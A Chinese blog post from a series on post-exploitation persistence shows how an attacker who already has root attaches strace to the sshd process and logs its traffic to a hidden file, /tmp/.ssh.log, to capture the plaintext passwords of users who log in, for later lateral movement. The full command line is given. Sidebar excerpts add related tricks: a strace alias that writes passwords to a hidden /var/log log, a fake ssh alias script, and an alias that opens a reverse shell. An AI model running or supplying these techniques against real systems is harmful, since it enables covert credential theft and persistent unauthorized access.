操作系统权限维持(十四)之Linux系统- Strace监听SSH来源流量记录密码后门

已于 2023-03-28 16:20:16 修改
阅读量1k 收藏 2
点赞数 1
分类专栏: 操作系统权限维持 文章标签: linux 服务器 网络安全 安全 网络
于 2023-03-28 15:43:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/129816774
版权
系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门
操作系统权限维持(八)之Linux系统-SSHKey后门
操作系统权限维持(九)之Linux系统-添加用户后门
操作系统权限维持(十)之Linux系统-SSH 软连接后门
操作系统权限维持(十一)之Linux系统-SSH Wrapper后门
操作系统权限维持(十二)之Linux系统-sudoers利用后门
操作系统权限维持(十三)之Linux系统- SSH Keylogger记录密码后门

Strace监听SSH来源流量记录密码后门

strace不只是可以监听连接他人,还可以用来抓到别人连入的密码。应用场景如:通过漏洞获取root权限,但是不知道明文密码在横向扩展中可以使用

之前有用别名的方式来抓取登陆其他机器时的密码、同样也可以利用strace来监听登陆本地的sshd流量

首先我们需要通过以下命令来查找sshd进程的PID

ps -ef | grep sshd #父进程PID

在这里插入图片描述

可以看到我们这里的PID是866

然后我们执行以下代码开始抓取流量

strace -f -p 866 -o /tmp/.ssh.log -e trace=read,write,connect -s 2048

此时我们任何使用ssh登录或者切换用户的操作,密码都会被记录到/tmp/.ssh.log文件中

这里我们用ssh以root身份连接到本机,以模仿用户ssh远程连接时的场景

ssh root@127.0.0.1

这里我们输入的密码是123456

在这里插入图片描述

当我们执行完后会发现之前的窗口已经在抓取流量了

在这里插入图片描述

现在我们去/tmp/.ssh.log文件中查找密码,发现了之前我们输入的连接密码123456,(.ssh.log文件中由于记录的流量信息比较多,所以查找起密码来可能比较麻烦和费时间)

vi /tmp/.ssh.log

在这里插入图片描述

怰月
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
用strace工具来解析ssh的登录密码
09-18 1826
首先要开ssh服务,查看一下。。root@unbuntu:/etc# ps -ef |grep sshroot 3996 1 0 13:51 ? 00:00:00 /usr/sbin/sshdroot 4463 3996 0 15:04 ? 00:00:00 sshd: nova [priv]sshd 44
linux 记录ssh密码,Linux下低权限用户记录SSH密码
weixin_33957458的博客
05-12 657
实现思路当用户执行 ssh user@remotehost 时,实际上执行的是我的恶意脚本,负责将用户输入的密码存在本地,并传参给正常的SSH连接,实现抓取SSH密码的功能。具体步骤首先使用 alias 命令创建一个别名这样当用户执行ssh时,执行的是指定的脚本alias ssh="/tmp/.ssh"当设置完别名后,仍可使用 /usr/bin/ssh 进行正常的SSH连接测试一下接下来观察正常的...
Linux权限维持—Strace监控&Alias别名&Cron定时任务
剁椒鱼头没剁椒的博客
08-23 743
在上篇文章中介绍了几种权限维持的方式,感觉很多手法都是能够被发现的,或者很明显的,比如文件的落地时间,通常在运维人员在看见新文件的时候,都会去看看,文件里面写的是什么,是谁建立的,如果运维人员就一个,那么肯定被查的概率更高。所以有时候需要适当的隐藏自己留的后门。alias在Linux中主要是用于设置命令的别名,比如当你设置ls等于ls -al的时候就可以使用alias来实现。
应急响应实战笔记——权限维持篇:④ Linux权限维持&后门
最新发布
君逍遥o
04-02 967
首先启动的是/usr/sbin/sshd,脚本执行到getpeername这里的时候,正则匹配会失败,于是执行下一句,启动/usr/bin/sshd,这是原始sshd。这个子进程,没有什么检验,而是直接执行系统默认的位置的/usr/sbin/sshd,这样子控制权又回到脚本了。它通过提供一些动态链接库和一套统一的API,将系统提供的服务和该服务的认证方式分开,使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序,同时也便于向系统中添加新的认证手段。如果匹配成功就可以登录了。
权限维持Linux&Rootkit后门&Strace监控&Alias别名&Cron定时任务
今天是几号的博客
04-16 1272
alias命令的功能:为命令设置别名定义:alias ls = ‘ls -al’删除:unalias ls每次输入ls命令的时候都能实现ls -alalerts'这样目标执行ls命令后可以上线,不过ls命令会被阻塞在那里,很容易引起怀疑,当结束终端窗口时,反弹shell的会话也会随着被终结,而且更改后的alias命令只在当前窗口才有效(重启也会失效)2、升级:))";alerts’进行base64编码是因为python程序有空行和空格,将一段命令转换成单行命令。
安全研究】Linux后渗透常见后门驻留方式分析
weixin_49128886的博客
11-09 1321
Linux后渗透常见后门驻留方式分析
应急响应入门之Linux分析排查
kali_Ma的博客
11-25 4011
前言: 当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。 针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些 Linux 服务器入侵排查的思路。 01文件分析-敏感文件信息 在linux系统下一切都是文件,其中/tmp是一个特别的临时目录文件。每个用户都可以对它进行读写操作。因此一个普通用户可以
Linux用strace查看系统调用
01-09
Linux世界,进程不能直接访问硬件设备,当进程需要访问硬件设备(比如读取磁盘文件,接收网络数据等等)时,必须由用户态模式切换至内核态模式,通 过系统调用访问硬件设备。strace可以跟踪到一个进程产生的系统...
linux命令之调试工具strace的深入分析
12-19
参考1《linux的strace命令(详解).txt》 新浪电子书可下载2man strace一个基本上通用的 完整的用法:strace -o output.txt -T -tt -e trace=all -p 28979上面的含义是 跟踪28979进程的所有系统调用(-e trace=all),...
Linux系统调用跟踪和进程错误退出分析.pdf
09-06
Linux系统调用跟踪是指在Linux操作系统中,通过各种工具和技术来跟踪和分析系统调用信息的过程。系统调用是操作系统提供给应用程序使用的接口,以便应用程序可以访问操作系统的各种资源和服务。系统调用跟踪是 debug...
strace命令 跟踪系统调用
01-09
strace命令是一个集诊断、调试、统计与一体的工具,我们可以使用strace对应用的系统调用和信号传递的跟踪结果来对应用进行分析,以达到解决问题或者是了解应用工作过程的目的。 strace常用来跟踪进程执行时的系统...
Linux应用调试之strace命令详解
09-15
strace常用来跟踪进程执行时的系统调用和所接收的信号。下面通过本文给大家分享Linux应用调试之strace命令,需要的朋友参考下吧
监听并保存ssh账号密码
weixin_30538029的博客
03-09 334
有时候渗透搞下一台服务器权限,想通过此服务器抓取其他服务器ssh密码。就可以用以下方法,如果管理员通过这台服务器作为跳板登录其他服务器密码就会记录下来。 alias ssh='strace -o /var/log/.kernel-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh' 会把ssh的账号密码输入保存到 /var/l...
利用strace找出ssh后门
weixin_33797791的博客
09-30 212
首先我先编译一个ssh后门,这个ssh后门会在/tmp/xxxxxx记录所有的登录密码启动他QUOTE:1root@laptop:/usr/local/openssh2/sbin# ps aux | grep sshd23root 13619 0.0 0.3 7432 1752 ? Ss 23:44 0:00 ./sshd -p 123445root 13707 0.0 0....
如何查看sshd当前配置 (gcore, gdb 的妙用)
weixin_33709609的博客
07-22 2109
背景 Linux sshd没有提供显示当前sshd的配置的接口,所以当我们需要了解它的配置时,怎么办呢? 另外我们还不知道sshd已经加载的配置文件名,这有从何下手呢? 本文将结合openssh的源码,给大家一种取得当前sshd配置的方法。 sshd将要加载哪些配置文件 调用sshd进程,并且通过strace输出open file。 就可以从...
Linux性能测试 strace命令
热门推荐
flyingqr的专栏
04-24 1万+
早些年,如果你知道有个 strace 命令,就很牛了,而现在大家基本都知道 strace 了,如果你遇到性能问题求助别人,十有八九会建议你用 strace 挂上去看看,不过当你挂上去了,看着满屏翻滚的字符,却十有八九看不出个所以然。本文通过一个简单的案例,向你展示一下在用 strace 诊断问题时的一些套路。  如下真实案例,如有雷同,实属必然!让我们看一台高负载服务器的 top 结果:
Trace - 一文读懂tracepoint
程序猿Ricky的日常干货
04-23 7475
tracepoint是Linux内核静态定义的一些调试点,它分布于内核的各个子系统中,然而在实际工作中可能很多人并没有用过这个功能,或者对它没有太多了解,那么就通过本文一起来了解下tracepoint吧。tracepoint是内核预先定义的静态探测点,可以用于挂载钩子函数来做trace。当没有钩子函数时,它几乎没有损耗,只有挂载了钩子函数才会真正启用trace功能。这个钩子函数可以由开发者编写内核module来实现,并且需要在钩子函数中获取我们调试所需要的信息并导出到用户态,这样我们就可以获取内核运行时的信
Linux (进程管理+SSHD服务+文件传输+网络配置)
Wolves_7的博客
12-28 435
进程管理:              程序被触发后 , 执行者的权限与属性、程序的程序码与所需数据等都会被载入内存中 , 操作系统并给予这个内存内的单元一个识别码 (PID), 可以说 , 进程就是一个正在运行中的程序         在Linux中,进行CPU分配是以线程为单位的, 一个进程可能由多个线程组成, 进程是操作系统分配资源的单位   进程状态: R (Running):...
linux用户密码转换为明文,Linux strace 明文密码抓取
weixin_39637711的博客
04-28 1327
strace常用来跟踪进程执行时的系统调用和所接收的信号,默认是没有安装,但是往往在提权后我们想得到root密码,我们可以使用这种方法来获取明文密码.安装很简单就一条命令 (Test On centos 6.5)yum install strace -y接下来要做先看一下sshd的pid:ps -ef | grep sshd[root@WebSrv ~]# ps -ef | grep sshdro...
Linux系统如何监听正在运行的某个进程的stdout
06-03
可以使用Linux命令行工具`strace`监听进程的stdout输出,具体命令如下: ``` strace -p [pid] -e write ``` 其中,`[pid]`为要监听的进程的ID。`-e write`选项表示只监听进程的写操作,也就是stdout输出。执行上述命令后,会实时显示进程的stdout输出。 另外,也可以使用Linux命令行工具`tail`监听进程的stdout输出,具体命令如下: ``` tail -f /proc/[pid]/fd/1 ``` 其中,`[pid]`为要监听的进程的ID。`/proc/[pid]/fd/1`表示进程的stdout文件描述符,通过`tail -f`命令可以实时监听该文件描述符的输出,从而实现对进程的stdout输出的监听

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值